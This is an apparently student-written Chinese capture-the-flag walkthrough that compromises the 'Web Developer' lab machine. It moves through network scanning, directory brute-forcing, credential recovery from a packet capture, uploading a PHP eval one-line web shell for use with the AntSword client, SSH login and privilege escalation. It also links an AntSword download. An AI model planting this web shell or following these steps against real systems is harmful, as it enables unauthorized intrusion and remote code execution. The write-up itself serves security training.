文章目录
前言
这是最后一次实验啦,让我们进入实战演练,以下拿CTF竞赛为例
实验内容如下
目的:获取靶机Web Developer 文件/root/flag.txt中flag。
基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。
一、发现目标,找到WebDeveloper的IP地址。
可通过前面介绍过的arpspoof来获得ip地址(netdiscover比较久)
命令行:arp-scan -l
(第一、第二个ip地址应该是网关,可以不用管,重点在于后面两个ip地址必有一个是我们所要寻找的ip地址,在浏览器中输入ip地址,便可得到WebDeveloper的网站)
二、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况
三、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。是否有可用信息?
进入网站后可发现网站存在一个后台登录链接四、探测目标网站使用的CMS模板。分析使用的CMS是什么?
推荐大家去火狐附加组件下载一个插件 在你所打开的网站点击使用就可以直接查看CMS模板了五、网络搜索wpscan,简要说明其功能。
WPScan是一款针对wwordpress的安全扫描软件;WPScan可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等
--百度百科
六、使用 Dirb 爆破网站目录。找到一个似乎和网络流量有关的目录(路径)。
易知,ipdata是我们要找的目录(大佬说的)七、浏览器访问该目录(路径),发现一个cap文件。
八、利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?
利用我们前面学到的知识,可先去查看tcp流中是否存在post包,里面是否存在帐号密码之类的信息
第一个明显不是我们要的
可看到帐号为:webdeveloper,密码为:Te5eQg&4sBS!Yr$)wf%(DcAd
九、利用上一步得到的信息进入网站后台。
十、查看wp-config.php获得账号及口令
(可以上网查看一下一句话木马的使用方法,配合上蚁剑风味更佳)`<?php @eval($_POST['attack']) ?>
建立一个文本文件将其复制进去,然后改成.php文件上传到网页
按照如下步骤进行,命令行在图中以给出
可以看到帐号为:webdeveloper,密码为:MasterOfTheUniverse
十一、SSH登录服务器,尝试利用上一步获得的访问数据库的用户名和密码连接远程服务器。
命令行:ssh 帐号@ip地址
普通用户的权限查看不了root文件,必须将其提权
命令行在图中已给出
总结
蚁剑链接
链接:https://pan.baidu.com/s/1b4DKcE_e6Ih3Z03s1Ax9Gg
提取码:qfwc
具体安装方法:https://blog.csdn.net/qq_36235492/article/details/85713821